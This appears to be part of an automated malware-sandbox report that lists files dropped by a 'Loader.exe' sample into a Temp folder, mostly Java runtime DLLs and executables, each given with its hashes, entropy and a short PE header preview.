                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):773968
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.901569696995594
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                                                                                                                                                                                                                                                                                              MD5:BF38660A9125935658CFA3E53FDC7D65
                                                                                                                                                                                                                                                                                                              SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                                                                                                                                                                                                                                                                                              SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                                                                                                                                                                                                                                                                                              SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr120.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):970912
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                                                                                                                              MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                                                                                                                              SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                                                                                                                              SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                                                                                                                              SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\net.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):79936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.675027571633986
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ygRdVzzmTj2iu+wk5eQjBE55W+hYRwZZ3GFjJJ5n5WF:yIfmHsM5j6VqJJ55WF
                                                                                                                                                                                                                                                                                                              MD5:691B937A898271EE2CFFAB20518B310B
                                                                                                                                                                                                                                                                                                              SHA1:ABEDFCD32C3022326BC593AB392DEA433FCF667C
                                                                                                                                                                                                                                                                                                              SHA-256:2F5F1199D277850A009458EDB5202688C26DD993F68FE86CA1B946DC74A36D61
                                                                                                                                                                                                                                                                                                              SHA-512:1C09F4E35A75B336170F64B5C7254A51461DC1997B5862B62208063C6CF84A7CB2D66A67E947CBBF27E1CF34CCD68BA4E91C71C236104070EF3BEB85570213EC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.._e.}.e.}.e.}.~'..d.}.~'..g.}.....f.}.~'..c.}.e.|..}.l...b.}.l...d.}.~'..D.}.~'..d.}.~'..d.}.~'..d.}.Riche.}.................PE..L...pPjW...........!.........l.....................o.........................`......-.....@.............................1............0............... ..@....@...................................... ...@...................l...`....................text............................... ..`.rdata...L.......N..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..*....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\nio.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51264
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.565433654691718
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:a+BEJER/xSW/EoB8VBQZbKYawLysHFhIAqQbQMD8YpwQ+Qi4v8qUYVC7R:a+BEJERvQGbKnwusjIAq08YDi4UqUYoR
                                                                                                                                                                                                                                                                                                              MD5:95EDB3CB2E2333C146A4DD489CE67CBD
                                                                                                                                                                                                                                                                                                              SHA1:79013586A6E65E2E1F80E5CAF9E2AA15B7363F9A
                                                                                                                                                                                                                                                                                                              SHA-256:96CF590BDDFD90086476E012D9F48A9A696EFC054852EF626B43D6D62E72AF31
                                                                                                                                                                                                                                                                                                              SHA-512:AB671F1BCE915D748EE49518CC2A666A2715B329CAB4AB8F6B9A975C99C146BB095F7A4284CD2AAF4A5B4FCF4F939F54853AF3B3ACC4205F89ED2BA8A33BB553
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J!...@..@..@...@..@...u..@...B..@..@..@..8M..@...t..@...E..@...D..@...C..@.Rich.@.........PE..L...pPjW...........!.....V...Z......9_.......p.....o................................X.....@..............................+..L|..........................@.......t....r...............................{..@............p...............................text...TT.......V.................. ..`.rdata...F...p...H...Z..............@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\npt.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17472
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.403594687791098
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:A3PK394shTLHzW8KMw3X+PVR6y/FNdoEUtnYe+PjPriT0fwoBpp6Z:BThTrzPPQOPV5NNdoEwnYPLr7xc
                                                                                                                                                                                                                                                                                                              MD5:94CAADA66F6316A9415A025C68388A18
                                                                                                                                                                                                                                                                                                              SHA1:57544E446B2B0CFBA0732F1F46522354F94B7908
                                                                                                                                                                                                                                                                                                              SHA-256:D1C4FB91296D643AEE6AB9CD66CC70ACBE2667AD572D969A06FFEAA2A8859FAF
                                                                                                                                                                                                                                                                                                              SHA-512:AC29E7C722A266DCB633953EF2A7E33DF02059AC7876FF94828464B5B74B5BC321C5D2D2851F3CBBFE1328D18F3CD9A49E5EFFE7E4E8AC2BEB3A0E4AAA53AD87
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w....@..w..O9K..w....O..w...w...w....M..w....x..w....y..w....H..w....I..w....N..w..Rich.w..........PE..L...qPjW...........!................)........0.....o.........................p......w.....@..........................7.._....3..<....P...............,..@....`.......0...............................2..@............0...............................text...>........................... ..`.rdata..O....0......................@..@.data...X....@......."..............@....rsrc........P.......$..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\orbd.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16448
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.380289288441742
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GpsCgvnvId6YmSHhV85AeencGtnYPLr7Vz:GpsDngGS/851ebC7Vz
                                                                                                                                                                                                                                                                                                              MD5:7DA6AA3CC4763C6F9C20B43E6C9A9547
                                                                                                                                                                                                                                                                                                              SHA1:3F28CF8E6AAD199DCC621F2A2C8AD50126813B05
                                                                                                                                                                                                                                                                                                              SHA-256:F7375AD07F0BE6FD75E822A9ECFF5ACA073DB03B95894C05C7657BEC7AF59AF4
                                                                                                                                                                                                                                                                                                              SHA-512:7948EAA11B4026F9975B6CC4225A4C0B617341299364196F3825EEF4484A6EEB529319BF4F6D19436689083C36BF1F6B9880574764612FC900C8CC1D73EED1BB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................z........ ....@..........................`......1.....@..................................#..P....@..H............(..@....P....... ..............................h"..@............ ...............................text............................... ..`.rdata..*.... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\pack200.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4779230305378315
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gpsk5Bn46zmSHhV8yYAeeU4Sz5uwnYPLr73ki:GpsungS/8yY1eUuwC79
                                                                                                                                                                                                                                                                                                              MD5:E9AA62B1696145A08D223E7190785E25
                                                                                                                                                                                                                                                                                                              SHA1:A9A0CB22A28A3843CF6CCBC9578B1438F0A7B500
                                                                                                                                                                                                                                                                                                              SHA-256:EA9DF3432EF31B6864112AF1CEC94E6BE33B92A9030369B9F99225113BCA6EF8
                                                                                                                                                                                                                                                                                                              SHA-512:516FA102922980DF592DD08A840DA9073B6568F5E52847968C59995F2BD067AC6D2668D0272AE017D0C71AF627766A8676AE1EB1BC520B76F1F9C5CEEB4BA840
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......#....@.................................D#..P....@..T............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...T....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\msvcr100.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):773968
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.901569696995594
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                                                                                                                                                                                                                                                                                              MD5:BF38660A9125935658CFA3E53FDC7D65
                                                                                                                                                                                                                                                                                                              SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                                                                                                                                                                                                                                                                                              SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                                                                                                                                                                                                                                                                                              SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\plugin2\npjp2.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):172096
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3747906238754855
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:1WkHL+UE3r2l5p2WqjgFWcWpPa6QoCzOb/UcODMM4cBqg8UyJNd5uGZzfYtRD+Em:YdNq5YkFuPYzOb/UcODMM4cBqg8UyJNR
                                                                                                                                                                                                                                                                                                              MD5:FB658E2F5E185FE5762B169A388BA0BD
                                                                                                                                                                                                                                                                                                              SHA1:386235AB2F7AD35E82CD9AC97E9B56E1E308BC90
                                                                                                                                                                                                                                                                                                              SHA-256:A91E68C76A90A02D9EDF75E5141C248B3AA5DD612E37883D27065D78A782AF20
                                                                                                                                                                                                                                                                                                              SHA-512:B0EAB6F2572552298CD221AF9E71CA7C02375D92E14F7EBD783F5DC9247964F72E658DBFC4273BD3C36DF57199171263F1A4969F133823965448C552BB514EEC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-n.C=.C=.C=...=..C=a..=..C=...=..C=...=..C=.B=..C=...=..C=...=.C=...=.C=...=.C=...=.C=...=.C=Rich.C=........................PE..L...rPjW...........!.....J...@.......-.......`.....o......................................@.............................A............ ...h..............@.......h....c..................................@............`..H............................text....H.......J.................. ..`.rdata..!....`.......N..............@..@.data...X!..........................@....rsrc....h... ...j..................@..@.reloc...".......$...d..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\policytool.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.477211573452372
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gps25Bnb61mSHhV8nOeet4SzvBQnYPLr7D8/:Gpson1S/8nTetJSC7+
                                                                                                                                                                                                                                                                                                              MD5:ED3F3D8E4C382BF8095B9DE217511E29
                                                                                                                                                                                                                                                                                                              SHA1:CAE91B9228C99DCC88BAC3293822AC158430778C
                                                                                                                                                                                                                                                                                                              SHA-256:800F41B877AA792A8469C4DBB99838E7A833B586EC41BD81DA81EAA571F7FAC1
                                                                                                                                                                                                                                                                                                              SHA-512:023855267C6CC6BD5230E7A922310328E8DC0521C041C038C579035C9B1E70EAC168695B56357793505375E0B134FAD040BB284C6B02B3190EE7F6FCAEC33FE9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`...........@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_common.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):52800
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.433054716020523
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:Rk2X5KQaT9nNrmTTY99ccAlGGzGRulFJWpiDO:RkgUhpmA99ccOGGzGRuPJWpgO
                                                                                                                                                                                                                                                                                                              MD5:6D05EAD2F6B95C4AFFCFB1B27DC0C188
                                                                                                                                                                                                                                                                                                              SHA1:0D04A67505D006493F252985AC294B534D271EF2
                                                                                                                                                                                                                                                                                                              SHA-256:6330591A151E565B5EAB2D174DF8E2F6523A8F403E4E8D8C8DC58D0945881F19
                                                                                                                                                                                                                                                                                                              SHA-512:DBE98FA16162636039853E9A82CADBE4E6D5A4E6E282A3FBBC122229C314C91E7C445FEB83921EBFE024DC09BC6AA76682F903036A2D2BEA363F1D09DD571B10
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..D5.w.5.w.5.w..J..7.w.5.v...w.8..6.w.8..6.w.8..9.w.8..7.w.H..2.w.H..4.w.8..4.w.H..4.w.Rich5.w.........................PE..L...pPjW...........!...............................o................................/&....@....................................<.......................@...............................................@............................................text.............................. ..`.rdata..X...........................@..@.data...D...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_d3d.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):116288
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7845827860105885
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:UbqmeUF67oaebwU3ta+uHMg9glgFvcfgfgzgG4g9XTXDXp+RuXGXlXdY9vXTXvXQ:8qmeUF67ZeUUVjcIA
                                                                                                                                                                                                                                                                                                              MD5:5AADADF700C7771F208DDA7CE60DE120
                                                                                                                                                                                                                                                                                                              SHA1:E9CF7E7D1790DC63A58106C416944FD6717363A5
                                                                                                                                                                                                                                                                                                              SHA-256:89DAC9792C884B70055566564AA12A8626C3AA127A89303730E66ABA3C045F79
                                                                                                                                                                                                                                                                                                              SHA-512:624431A908C2A835F980391A869623EE1FA1F5A1A41F3EE08040E6395B8C11734F76FE401C4B9415F2055E46F60A7F9F2AC0A674604E5743AB8301DBADF279F2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tm....X...X...X.G.X...X.G.X...X.G.X...X.G.X...XR..X...X...X...X.l.X...X.l.X...X.G.X...X.l.X...XRich...X........PE..L...pPjW...........!................=..............o................................|.....@.........................0...K...|...d.......................@....... ......................................@...............4............................text.............................. ..`.rdata..X...........................@..@.data...............................@....rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\prism_sw.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):86592
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.686302444148156
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:/QsPinZd9lmzFRQnJ9sSpkWgVenAe7C3xWxNO3A4:lPE9lEmtpkj7eqWxNCA4
                                                                                                                                                                                                                                                                                                              MD5:5E6DDF7CF25FD493B8A1A769EF4C78F7
                                                                                                                                                                                                                                                                                                              SHA1:42748051176B776467A31885BB2889C33B780F2D
                                                                                                                                                                                                                                                                                                              SHA-256:B9BEACA57BFF23C953917C0B2037351EF3334E6A9DE447DCA6542FE5C815BF9F
                                                                                                                                                                                                                                                                                                              SHA-512:C47F742F064B99E5B9C2BDEAC97472D9D8C9466C9071E9799AF79F820199D9B30B198C33EF635F07A972B77475AFEA9E7417AA6335D22A7380E7B0E552869C18
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!3.ueRr&eRr&eRr&...&gRr&eRs&ERr&h..&fRr&h..&oRr&h..&hRr&h..&gRr&.+.&nRr&.+.&dRr&h..&dRr&.+.&dRr&RicheRr&........PE..L...qPjW...........!................~..............o................................O.....@........................../..B...D4..<....p...............:..@.......\...................................0...@...............|............................text...4........................... ..`.rdata..*w.......x..................@..@.data...$....@....... ..............@..._RDATA.......`.......(..............@..@.rsrc........p.......0..............@..@.reloc..\............4..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\resource.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14912
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.381906222478272
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:kNncquU+hyD13XLPVlD6o+N9F5os7USnYe+PjPriT0fwXF27:kNcWp7PVl67/nYPLr7s27
                                                                                                                                                                                                                                                                                                              MD5:3C9DC0ED8ADD14A0E5B845C1ACC2FF2E
                                                                                                                                                                                                                                                                                                              SHA1:25C395ADE02199BEDCEE95C65E088B758CD84435
                                                                                                                                                                                                                                                                                                              SHA-256:367C552FBA3DA5F22791CF8F22B983871639ECD2EF7F5B1880021FE4C4F65EE4
                                                                                                                                                                                                                                                                                                              SHA-512:4DD5F68180D03B6621E46732F04B47F996B96F91F67845538D1B303E598CCFDB5E4F785A76DE7DFCB8918125FDB06B9068C4EAB06984B5AA9224DCE90190BA1A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z>Mg._#4._#4._#4.'.4._#4..4._#4..4._#4..4._#4._"4>_#4..4._#4..4._#4..4._#4..4._#4Rich._#4................PE..L...pPjW...........!......................... .....o.........................`.......>....@..........................%......\"..d....@..............."..@....P..D.... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc.......P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmid.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.466364086630595
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Gpss5cnn6vmSHhV8TI1ee84SzK8nYPLr7HuY:Gps7nnS/8Tte8tC7HuY
                                                                                                                                                                                                                                                                                                              MD5:12B6E1C3205A8B17AC20E00A889DFC43
                                                                                                                                                                                                                                                                                                              SHA1:42458CFA7135858ACEF10803B87A208FA7E66413
                                                                                                                                                                                                                                                                                                              SHA-256:EAEA20A794EC6BB15808EF278376A87CF91F9BE15FE6A7DE92014AC4BF75555D
                                                                                                                                                                                                                                                                                                              SHA-512:174703820636DED2BA081420A8D1E37D67FDA6C13AC406C2F08E16DCF0C7B7D9642E37BC888802B50ED3438D6029C4FECCD7C151B82CF9A91F13F36C4A0B2019
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......r.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15936
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.475930674615241
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:GpsFG5BnK6xmSHhV8TCeeX4SzREnYPLr7Ggp:Gpsen0S/8TveXUC7jp
                                                                                                                                                                                                                                                                                                              MD5:31C0CED43A07A2DFF3AFC557EBABBE0F
                                                                                                                                                                                                                                                                                                              SHA1:9100A7393B919EB35C79CE16A559D783219E2F20
